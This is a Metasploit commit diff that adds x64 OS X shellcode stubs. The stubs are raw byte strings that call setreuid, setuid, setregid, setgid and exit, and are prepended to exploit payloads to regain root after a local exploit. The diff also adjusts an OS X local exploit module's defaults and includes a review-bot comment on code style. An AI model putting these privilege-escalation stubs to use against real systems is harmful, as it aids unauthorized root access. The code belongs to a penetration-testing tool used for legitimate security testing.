Land #5127, x64 OS X prepend stubs 'n' stuff

bug/bundler_fix
William Vu 2015-04-14 01:25:39 -05:00
commit e114c85044
GPG Key ID: 68BD00CE25866743
9 changed files with 157 additions and 101 deletions


@ -87,10 +87,6 @@ module Msf::Payload::Linux
ret ret
end end
#
# Overload the generate() call to prefix our stubs
#
def apply_prepends(buf) def apply_prepends(buf)
pre = '' pre = ''
app = '' app = ''


@ -23,49 +23,49 @@ module Msf::Payload::Osx
[ [
false, false,
"Prepend a stub that executes the setresuid(0, 0, 0) system call", "Prepend a stub that executes the setresuid(0, 0, 0) system call",
"false" false
] ]
), ),
Msf::OptBool.new('PrependSetreuid', Msf::OptBool.new('PrependSetreuid',
[ [
false, false,
"Prepend a stub that executes the setreuid(0, 0) system call", "Prepend a stub that executes the setreuid(0, 0) system call",
"false" false
] ]
), ),
Msf::OptBool.new('PrependSetuid', Msf::OptBool.new('PrependSetuid',
[ [
false, false,
"Prepend a stub that executes the setuid(0) system call", "Prepend a stub that executes the setuid(0) system call",
"false" false
] ]
), ),
Msf::OptBool.new('PrependSetresgid', Msf::OptBool.new('PrependSetresgid',
[ [
false, false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call", "Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false" false
] ]
), ),
Msf::OptBool.new('PrependSetregid', Msf::OptBool.new('PrependSetregid',
[ [
false, false,
"Prepend a stub that executes the setregid(0, 0) system call", "Prepend a stub that executes the setregid(0, 0) system call",
"false" false
] ]
), ),
Msf::OptBool.new('PrependSetgid', Msf::OptBool.new('PrependSetgid',
[ [
false, false,
"Prepend a stub that executes the setgid(0) system call", "Prepend a stub that executes the setgid(0) system call",
"false" false
] ]
), ),
Msf::OptBool.new('AppendExit', Msf::OptBool.new('AppendExit',
[ [
false, false,
"Append a stub that executes the exit(0) system call", "Append a stub that executes the exit(0) system call",
"false" false
] ]
), ),
], Msf::Payload::Osx) ], Msf::Payload::Osx)
@ -73,95 +73,155 @@ module Msf::Payload::Osx
ret ret
end end
def apply_prepends(buf)
# test_arch = [ *(self.arch) ]
# Overload the generate() call to prefix our stubs
#
def generate(*args)
# Call the real generator to get the payload
buf = super(*args)
pre = '' pre = ''
app = '' app = ''
test_arch = [ *(self.arch) ]
# Handle all x86 code here # Handle all x86 code here
if (test_arch.include?(ARCH_X86)) if (test_arch.include?(ARCH_X86))
handle_x86_osx_opts(pre, app)
# Prepend elsif (test_arch.include?(ARCH_X86_64))
handle_x64_osx_opts(pre, app)
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x37\x01" +# movw $0x0137,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7e" +# movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
# Append
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xcd\x80" # int $0x80 #
end
end end
return (pre + buf + app) pre + buf + app
end
def handle_x86_osx_opts(pre, app)
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x37\x01" +# movw $0x0137,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7e" +# movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xcd\x80" # int $0x80 #
end
end
def handle_x64_osx_opts(pre, app)
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
raise RuntimeError, "setresuid syscall is not implemented on x64 OSX systems"
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x7e" +# or r8, 126 (setreuid=126)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x17" +# or r8, 23 (setuid=23)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
raise RuntimeError, "setresgid syscall is not implemented on x64 OSX systems"
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x7f" +# or r8, 127 (setregid=127)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x17" +# shl r8, 23
"\x49\x83\xc8\x5a" +# or r8, 90 (setgid=181>>1=90)
"\x49\xd1\xe0" +# shl r8, 1
"\x49\x83\xc8\x01" +# or r8, 1 (setgid=181&1=1)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['AppendExit'])
# exit(0)
app << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x01" +# or r8, 1 (exit=1)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
end
end end
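Review bot: In the new `apply_prepends`, when `test_arch` contains neither ARCH_X86 nor ARCH_X86_64 the `if`/`elsif` falls through and every Prepend*/AppendExit option is silently dropped, which is inconsistent with `handle_x64_osx_opts` raising for the two stubs it lacks; a guard such as `elsif %w[PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid AppendExit].any? { |o| datastore[o] }` followed by `raise RuntimeError, "Prepend/Append stubs are not implemented for arch #{test_arch.inspect}"` would make the unsupported combination visible instead. The messages `"setresuid syscall is not implemented on x64 OSX systems"` and the setresgid twin read as a kernel limitation, whereas the x86 handler in the same hunk already emits stubs for both calls, so the gap looks like a missing x64 stub rather than a missing syscall; `raise "PrependSetresuid stub is not implemented for x64 OSX payloads"` states that more accurately. `handle_x86_osx_opts` and `handle_x64_osx_opts` are internal helpers of the mixin and would be better placed under a `protected` section if the module has one (not visible in this hunk). The parenthesised conditions such as `if (datastore['PrependSetresuid'])` are non-idiomatic Ruby; `if datastore['PrependSetresuid']` suffices.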


@ -42,13 +42,13 @@ class Metasploit4 < Msf::Exploit::Local
'Platform' => 'osx', 'Platform' => 'osx',
'Arch' => ARCH_X86_64, 'Arch' => ARCH_X86_64,
'SessionTypes' => ['shell'], 'SessionTypes' => ['shell'],
'Privileged' => true,
'Targets' => [ 'Targets' => [
['Mac OS X 10.9-10.10.2', {}] ['Mac OS X 10.9-10.10.2', {}]
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DefaultOptions' => { 'DefaultOptions' => {
'PAYLOAD' => 'osx/x64/shell_reverse_tcp', 'PrependSetreuid' => true
'CMD' => '/bin/zsh'
} }
)) ))


@ -17,7 +17,7 @@ require 'msf/core'
### ###
module Metasploit3 module Metasploit3
CachedSize = 81 CachedSize = 16
include Msf::Payload::Single include Msf::Payload::Single
include Msf::Payload::Osx include Msf::Payload::Osx


@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3 module Metasploit3
CachedSize = 139 CachedSize = 74
include Msf::Payload::Single include Msf::Payload::Single
include Msf::Payload::Osx include Msf::Payload::Osx


@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3 module Metasploit3
CachedSize = 126 CachedSize = 61
include Msf::Payload::Single include Msf::Payload::Single
include Msf::Payload::Osx include Msf::Payload::Osx


@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3 module Metasploit3
CachedSize = 130 CachedSize = 65
include Msf::Payload::Single include Msf::Payload::Single
include Msf::Payload::Osx include Msf::Payload::Osx


@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3 module Metasploit3
CachedSize = 217 CachedSize = 152
include Msf::Payload::Single include Msf::Payload::Single
include Msf::Payload::Osx include Msf::Payload::Osx


@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3 module Metasploit3
CachedSize = 196 CachedSize = 131
include Msf::Payload::Single include Msf::Payload::Single
include Msf::Payload::Osx include Msf::Payload::Osx